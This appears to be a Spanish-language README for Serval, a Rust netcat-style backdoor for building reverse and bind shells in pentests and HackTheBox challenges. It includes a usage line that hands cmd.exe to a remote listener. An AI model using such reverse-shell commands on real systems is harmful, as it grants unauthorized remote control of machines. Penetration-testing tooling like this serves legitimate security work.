
Una puerta trasera estilo Netcat para pruebas de penetración y ejercicios de pentest.
Serval es un binario ligero y fácil de usar para generar shells reversos y vinculados (bind shells) para pentests o ejercicios de pentesting. Serval es multiplataforma y se puede compilar tanto para Windows de 32 y 64 bits como para Linux de 32 y 64 bits. Nota: Debido a la flexibilidad de Rust, es posible compilar para otras plataformas (como ARM), pero no lo he probado en otras plataformas.
Desarrollé Serval para eliminar mi dependencia de netcat durante los desafíos de HacktheBox, ya que puede ser molesto encontrar binarios de netcat para Windows (especialmente con la opción -e) y es aún más difícil encontrar un binario de una fuente confiable.
Descarga el código fuente desde GitHub
git clone https://github.com/tgadola/serval.git && cd serval-master
*Opcional: Edita el archivo de compilación en .cargo/config para reescribir tu ruta de compilación.
Construye el binario para tu plataforma actual.
cargo build --release
*Nota: v1.1.0 requiere Rust nightly
Puedes construir para otras plataformas usando
cargo build --release --target <target-triple>
Si eres una persona particularmente confiada, puedes descargar los binarios precompilados aquí.
Por defecto, Serval escucha o se conecta a un puerto y redirige la entrada y salida estándar a esa conexión. La bandera -e inicia un proceso y redirige su entrada y salida estándar a través de la red.
Serval escucha en todas las interfaces.
¡Usa la bandera -H para activar la edición de línea y las funciones de historial de comandos!
serval -l 4400 -H
serval.exe <ip de escucha> <puerto de escucha> -q -e cmd.exe
Un gran agradecimiento a @kkawakam-transferwise y su crate Rustyline, que literalmente hace todo el trabajo pesado. ¡Echa un vistazo a Rustyline!
¡Gracias a los creadores y contribuyentes de Clap! Echa un vistazo a Clap.
¡Gracias a los creadores y contribuyentes de Anyhow! Echa un vistazo a Anyhow. +1 por el gran nombre del crate.
Gracias a @jaynus por todos sus consejos sobre Rust
Apache 2.0. Consulta el archivo de licencia para más información.